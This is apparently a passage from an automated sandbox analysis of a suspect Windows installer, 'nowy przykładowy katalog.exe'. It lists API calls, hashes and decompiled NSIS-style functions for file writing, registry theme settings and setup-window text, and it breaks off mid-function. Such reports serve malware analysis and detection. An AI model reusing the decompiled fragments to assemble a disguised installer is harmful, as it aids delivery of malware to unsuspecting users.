                                                  • _memset.LIBCMT ref: 10001CF0
                                                  • SystemParametersInfoW.USER32 ref: 10001D20
                                                  • SystemParametersInfoW.USER32 ref: 10001D50
                                                  • _memset.LIBCMT ref: 10001D88
                                                  • SystemParametersInfoW.USER32 ref: 10001DAE
                                                  • SystemParametersInfoW.USER32 ref: 10001DDE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: InfoParametersSystem$_memset$CloseColorCreateValue_strlen
                                                  • String ID: \$\
                                                  • API String ID: 4051568106-164819647
                                                  • Opcode ID: e86eaccf48e01d306096e01cfce6499f24cdd14e702cf35f8c1faeaa67c55391
                                                  • Instruction ID: 25441f60d2184d1c2127a7067067bf1a089242a184018c3b10890c33f48756fc
                                                  • Opcode Fuzzy Hash: e86eaccf48e01d306096e01cfce6499f24cdd14e702cf35f8c1faeaa67c55391
                                                  • Instruction Fuzzy Hash: 7441B0B48093159FE754EF28C98839EBBF0FF44304F10C99DE49897250DB7999848F42
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10003D50, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 90registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CloseColorCreateValue_strlen
                                                  • String ID: %d %d %d$?$Control Panel\Colors
                                                  • API String ID: 1366408527-47058604
                                                  • Opcode ID: 5bba8b40adcde4f59441a719dbe2af6fcb2358c86d81045ac14223ac18ffac2f
                                                  • Instruction ID: fc9d29c2e160d3d7f392e6ac5403772cc1770c915a38a1b3bc6d914128e9e0ee
                                                  • Opcode Fuzzy Hash: 5bba8b40adcde4f59441a719dbe2af6fcb2358c86d81045ac14223ac18ffac2f
                                                  • Instruction Fuzzy Hash: 764115B69083159FEB04DF69D4846AEBBF1FF88314F00892EE489A7341D7759948CF92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10001000, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GlobalAddAtomW.KERNEL32 ref: 10001015
                                                  • GlobalAddAtomW.KERNEL32 ref: 1000102D
                                                  • GlobalAddAtomW.KERNEL32 ref: 10001045
                                                  • GlobalAddAtomW.KERNEL32 ref: 1000105D
                                                    • Part of subcall function 10001080: RegOpenKeyW.ADVAPI32 ref: 1000109F
                                                    • Part of subcall function 10001080: RegQueryValueExW.ADVAPI32 ref: 10001103
                                                    • Part of subcall function 10001080: RegQueryValueExW.ADVAPI32 ref: 10001198
                                                    • Part of subcall function 10001080: RegQueryValueExW.ADVAPI32 ref: 100011FA
                                                    • Part of subcall function 10001080: RegCloseKey.ADVAPI32 ref: 1000124C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: AtomGlobal$QueryValue$CloseOpen
                                                  • String ID: ux_dialogtheme$ux_subapp$ux_subidlst$ux_theme
                                                  • API String ID: 4274996849-3424715226
                                                  • Opcode ID: 5e00b0d77e9f3ff627b14cc8c305e043a319390189e961234fff0d7b0717eb83
                                                  • Instruction ID: cc3f60c883018a98a1aae38f66b26a9a632f1e8596c1e5eb3b4238c224fc026c
                                                  • Opcode Fuzzy Hash: 5e00b0d77e9f3ff627b14cc8c305e043a319390189e961234fff0d7b0717eb83
                                                  • Instruction Fuzzy Hash: 31F09CB95152A4CFEB05EFB8D9CA45A7B70BB00305B00C52EE88947264EBB5E158DB86
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405E29, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00405E29(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405727(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004056E5("*?|<>/\":", _t5))) == 0) {
							E0040585F(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                  0x00405e2b
                                                  0x00405e33
                                                  0x00405e47
                                                  0x00405e47
                                                  0x00405e4d
                                                  0x00405e5a
                                                  0x00405e5a
                                                  0x00405e5b
                                                  0x00405e5d
                                                  0x00405e61
                                                  0x00405e63
                                                  0x00405e6c
                                                  0x00405e6e
                                                  0x00405e88
                                                  0x00405e90
                                                  0x00405e90
                                                  0x00405e95
                                                  0x00405e97
                                                  0x00405e99
                                                  0x00405e9d
                                                  0x00405e9e
                                                  0x00405ea1
                                                  0x00405ea9
                                                  0x00405eab
                                                  0x00405eaf
                                                  0x00000000
                                                  0x00000000
                                                  0x00405eb5
                                                  0x00405eba
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405eba
                                                  0x00405ebf

                                                  APIs
                                                  • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E81
                                                  • CharNextA.USER32(?,?,?,00000000), ref: 00405E8E
                                                  • CharNextA.USER32(?,"C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E93
                                                  • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405EA3
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E2A, 00405E2F
                                                  • *?|<>/":, xrefs: 00405E71
                                                  • "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" , xrefs: 00405E65
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 589700163-535955014
                                                  • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                  • Instruction ID: 6784d5a4761720cd8368ccbdd0638492f40d0cd734ea18b92361b53ebca16514
                                                  • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                  • Instruction Fuzzy Hash: BA11E671804B9129EB3217248C44B7B7F89CB5A7A0F18407BE5D5722C2C77C5E429EAD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 100014A0, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 64registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyW.ADVAPI32 ref: 1000152B
                                                  • RegSetValueExW.ADVAPI32 ref: 10001571
                                                  • RegCloseKey.ADVAPI32 ref: 10001583
                                                    • Part of subcall function 100015C0: RegCreateKeyExW.ADVAPI32 ref: 10001625
                                                    • Part of subcall function 100015C0: SystemParametersInfoW.USER32 ref: 10001678
                                                    • Part of subcall function 100015C0: RegSetValueExW.ADVAPI32 ref: 100016C1
                                                    • Part of subcall function 100015C0: _memset.LIBCMT ref: 10001701
                                                    • Part of subcall function 100015C0: SystemParametersInfoW.USER32 ref: 10001731
                                                    • Part of subcall function 100015C0: RegSetValueExW.ADVAPI32 ref: 1000177A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Value$InfoParametersSystem$CloseCreateOpen_memset
                                                  • String ID: (%d)$1$Software\Microsoft\Windows\CurrentVersion\ThemeManager$ThemeActive
                                                  • API String ID: 1181574500-3417774832
                                                  • Opcode ID: 2866952081d3a7ae57e2f8b6fa27478bd80cc6aefd809aed57ed88c9d7beae50
                                                  • Instruction ID: 88e302a3cc619786090ceb89693497163ae79a82c71de8db697098f3c4f0f0a6
                                                  • Opcode Fuzzy Hash: 2866952081d3a7ae57e2f8b6fa27478bd80cc6aefd809aed57ed88c9d7beae50
                                                  • Instruction Fuzzy Hash: F721D774804314DFE704EFA4C58969EBBF0FF44380F10892DE88997255E7749A84DB82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 100017A6, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 34registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CloseInfoParametersSystemValue_memset
                                                  • String ID: IconTitleFont$\$\
                                                  • API String ID: 549746852-773436331
                                                  • Opcode ID: d5b6c1db21d7c5afde35c0070c5c16e83dada74116f9dea27fd5958d855ab9f2
                                                  • Instruction ID: 55b194ef40cdad6822c00e03f5f6d2094a0314672dd6cbfcc0724edb950dd0ac
                                                  • Opcode Fuzzy Hash: d5b6c1db21d7c5afde35c0070c5c16e83dada74116f9dea27fd5958d855ab9f2
                                                  • Instruction Fuzzy Hash: 8601C9B18043159FE714EF68D94939EBBF0FB84304F00899EE49DA7350D77596848F82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403EEA, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00403EEA(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                  0x00403efc
                                                  0x00403f90
                                                  0x00000000
                                                  0x00403f90
                                                  0x00403f0d
                                                  0x00403f11
                                                  0x00000000
                                                  0x00000000
                                                  0x00403f17
                                                  0x00403f20
                                                  0x00403f23
                                                  0x00403f23
                                                  0x00403f29
                                                  0x00403f2f
                                                  0x00403f2f
                                                  0x00403f3b
                                                  0x00403f41
                                                  0x00403f48
                                                  0x00403f4b
                                                  0x00403f4e
                                                  0x00403f50
                                                  0x00403f50
                                                  0x00403f58
                                                  0x00403f5e
                                                  0x00403f5e
                                                  0x00403f68
                                                  0x00403f6d
                                                  0x00403f70
                                                  0x00403f75
                                                  0x00403f78
                                                  0x00403f78
                                                  0x00403f88
                                                  0x00403f88
                                                  0x00000000

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                  • Instruction ID: d9f5f29c4b32eaf67df6904808fcf7c938901a1e5be6cbe83ca05de02e5bcf8c
                                                  • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                  • Instruction Fuzzy Hash: A9215471904745ABC7219F78DD08B4BBFF8AF01715F04856AE856E22E0D734EA04CB55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10001E80, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 107COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ErrorLastPropWindow
                                                  • String ID: = %p$(%p,%s, %x)$unhandled flags: %x
                                                  • API String ID: 3600928031-1922187145
                                                  • Opcode ID: 21ecd27a23b81efd7d55e99d13fdbc8bcf03fb39b44bc6f2b5452cc55c293649
                                                  • Instruction ID: 131dd3a28fd9b00acbc1088055883de84b59c56b4bf0623045d3418d222c81e5
                                                  • Opcode Fuzzy Hash: 21ecd27a23b81efd7d55e99d13fdbc8bcf03fb39b44bc6f2b5452cc55c293649
                                                  • Instruction Fuzzy Hash: 7051A0B49042299FDB14DF28C4847A9BBF0EF48350F0088AEE99997351D7749A84CF96
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004026AF, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 86%
                                                  			E004026AF(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
				_t52 = E00402A29(0xfffffff0);
				 *(_t58 - 0x38) = _t24;
				if(E00405727(_t52) == 0) {
					E00402A29(0xffffffed);
				}
				E0040587F(_t52);
				_t27 = E0040589E(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x42ec34; // 0x27c00
					 *(_t58 - 0x30) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004030E2(_t47);
						E004030B0(_t51,  *(_t58 - 0x30));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
						 *(_t58 - 0x34) = _t56;
						if(_t56 != _t47) {
							E00402E8E( *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x48) =  *_t56;
								E0040585F( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x48);
							}
							GlobalFree( *(_t58 - 0x34));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
						GlobalFree(_t51);
						 *((intOrPtr*)(_t58 - 0xc)) = E00402E8E(0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x38));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                                  0x004026af
                                                  0x004026b1
                                                  0x004026bd
                                                  0x004026c0
                                                  0x004026ca
                                                  0x004026ce
                                                  0x004026ce
                                                  0x004026d4
                                                  0x004026e1
                                                  0x004026e9
                                                  0x004026ec
                                                  0x004026f2
                                                  0x00402700
                                                  0x00402705
                                                  0x00402709
                                                  0x0040270c
                                                  0x00402715
                                                  0x00402721
                                                  0x00402725
                                                  0x00402728
                                                  0x00402732
                                                  0x00402751
                                                  0x00402739
                                                  0x0040273e
                                                  0x00402746
                                                  0x00402749
                                                  0x0040274e
                                                  0x0040274e
                                                  0x00402758
                                                  0x00402758
                                                  0x0040276a
                                                  0x00402771
                                                  0x00402783
                                                  0x00402783
                                                  0x00402789
                                                  0x00402789
                                                  0x00402794
                                                  0x00402795
                                                  0x00402799
                                                  0x0040279d
                                                  0x004027a3
                                                  0x004027a3
                                                  0x004027aa
                                                  0x00402197
                                                  0x004028c1
                                                  0x004028cd

                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,00027C00,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                                                  • GlobalFree.KERNEL32 ref: 00402758
                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040276A
                                                  • GlobalFree.KERNEL32 ref: 00402771
                                                  • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402789
                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                  • String ID:
                                                  • API String ID: 3294113728-0
                                                  • Opcode ID: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
                                                  • Instruction ID: 7359f6b8c72d8bce8f96c3519292fde75c250a44c6e0f48ea69dd088617f1d2a
                                                  • Opcode Fuzzy Hash: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
                                                  • Instruction Fuzzy Hash: 9D319C71C00028BBCF216FA5DE88DAEBA79EF04364F14423AF914762E0C67949018B99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404EB3, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00404EB3(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42e404; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42ecd4; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405BE9(0, _t39, 0x429878, 0x429878, _a4);
					}
					_t26 = lstrlenA(0x429878);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42e3e8, 0x429878);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x429878;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x429878)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x429878, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                  0x00404eb9
                                                  0x00404ec5
                                                  0x00404ec8
                                                  0x00404ece
                                                  0x00404eda
                                                  0x00404edd
                                                  0x00404ee0
                                                  0x00404ee6
                                                  0x00404ee6
                                                  0x00404eec
                                                  0x00404ef4
                                                  0x00404ef7
                                                  0x00404f14
                                                  0x00404f18
                                                  0x00404f21
                                                  0x00404f21
                                                  0x00404f2b
                                                  0x00404f34
                                                  0x00404f40
                                                  0x00404f47
                                                  0x00404f4b
                                                  0x00404f4e
                                                  0x00404f61
                                                  0x00404f6f
                                                  0x00404f6f
                                                  0x00404f73
                                                  0x00404f75
                                                  0x00404f78
                                                  0x00000000
                                                  0x00404f78
                                                  0x00404ef9
                                                  0x00404f01
                                                  0x00404f09
                                                  0x00404f0f
                                                  0x00000000
                                                  0x00404f0f
                                                  0x00404f09
                                                  0x00404ef7
                                                  0x00404f82

                                                  APIs
                                                  • lstrlenA.KERNEL32(00429878,00000000,0041F64C,747DEA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                                  • lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041F64C,747DEA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                                  • lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041F64C,747DEA30), ref: 00404F0F
                                                  • SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2531174081-0
                                                  • Opcode ID: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
                                                  • Instruction ID: b2aff46cb4fd7b93265c813df518c908744a9a116baeb32a25c95395085da7a4
                                                  • Opcode Fuzzy Hash: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
                                                  • Instruction Fuzzy Hash: BA219D71900118BFDB119FA5CD80DDEBFB9EF45354F14807AF544B62A0C739AE408BA8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004038E3, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 71COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004038E3(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405B3E(__ecx, "1033");
				while(1) {
					_t26 =  *0x42ec64; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x42ec30; // 0x79ee58
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x42ec60;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x42e400 = _t18[1];
					 *0x42ecc8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42e3fc = _t23;
						E00405B25(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x42a078, E00405BE9(_t13, _t24, _t26, "egkwshqw Setup", 0xfffffffe));
						_t11 =  *0x42ec4c; // 0x1
						_t27 =  *0x42ec48; // 0x79f004
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x79f01c
